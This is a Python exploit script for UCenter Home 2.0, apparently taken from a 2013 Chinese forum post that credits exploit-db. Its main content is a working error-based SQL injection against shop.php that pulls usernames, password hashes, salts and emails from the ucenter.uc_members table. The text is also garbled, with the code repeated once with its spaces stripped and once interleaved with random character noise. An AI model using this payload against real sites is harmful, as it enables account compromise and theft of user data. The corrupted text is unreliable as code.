#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl
2 @! k$ H0 M+ T# U( P0 s
: r8 J# P' j' `) R( V! ]* V4 f, I$ m9 f7 o1 r/ o- H. U
#!/usr/bin/env python 5 S+ I! k/ n5 c8 r2 }
+ _2 X3 J4 B% u+ ^3 M+ L
import sys
) A, ]" r3 B" n, `9 x( y, r: U- q( Limport urllib2 V5 F4 W4 d$ ^
import re & q" M4 p7 u# g
+ L/ ~- }0 \) Q9 \- s$ wdef info():
1 Q( C3 p- J/ w' w& k/ o1 ?( [7 w print 'From:http://www.exploit-db.com/exploits/14997/'
' ]1 q3 m5 d! ~4 r6 Y print 'http://www.hake.cc/Web_loudong/' 4 @0 V1 W4 G. M/ L) e9 @" E: |8 X' e4 d
print 'changed:qiaoy'
* y7 I$ n7 [! b8 Q& L' a& | print 'exp:'
! `1 y; y5 c1 n" c% w: O- T9 V print ' ./UCenter_Home_2.0.py site' 2 N( Y/ k$ g; R( `, o4 x3 R) o
3 _2 [& h( z; _2 p: V0 \- D8 jdef main():
7 H' z; g$ x) @; O8 N- \ D if len(sys.argv) != 2: o6 E& t0 l. m
info() $ I8 |1 H. o8 ]' D7 p7 ~* P
else:
, x( s" K: Z& z+ A, W site = sys.argv[1]
$ m, m {+ m" Q. v7 ^) R6 n if site[0:7] == 'http://':
. y! v! N4 n! {7 P; L: @: O sitesite =site
4 J6 c& B' R+ p& X elif site[0:8] == 'https://': 0 w2 M {, ^+ c! k8 g- f# H
sitesite = site & o% e: R+ f" h6 G# Q
else:
/ T& B1 I( g' |, H# c* j site = 'http://'+site
* n$ X1 R2 b# K8 O* z& Q try: * H( b) j, n. h/ ~- ]
url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1' 7 x+ B5 R+ |9 C7 I0 P
Value = urllib2.urlopen(url).read()
3 Q8 r, @6 o9 Q7 m7 z- e Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]
0 T, ?6 R( o! X- e9 Y* {# \1 M* \ hacked = Msg.split(':') 4 m" J- b: f1 h
print 'Name: '+hacked[1]
8 D, X m0 B I8 E# ~# C print 'Passwd: '+hacked[2] - p* I( q2 I$ |, s
print 'salt: '+hacked[3]
3 a6 y' f4 i& a- f9 w print 'email: '+hacked[4] " E0 M+ |3 L. `5 @4 n8 l, i
except:
3 M6 @! H" e+ d' y$ z( X6 b/ A print 'Sorry,I can\'t work............'
L2 H$ G: i- \; n2 m
1 ]. G: Z& O {- ?6 o6 l; J" Y, kif __name__ == '__main__':
R6 v+ F! c2 }' z1 v0 }8 r main() |
发表于 2013-1-23 09:18:17
收藏
支持
反对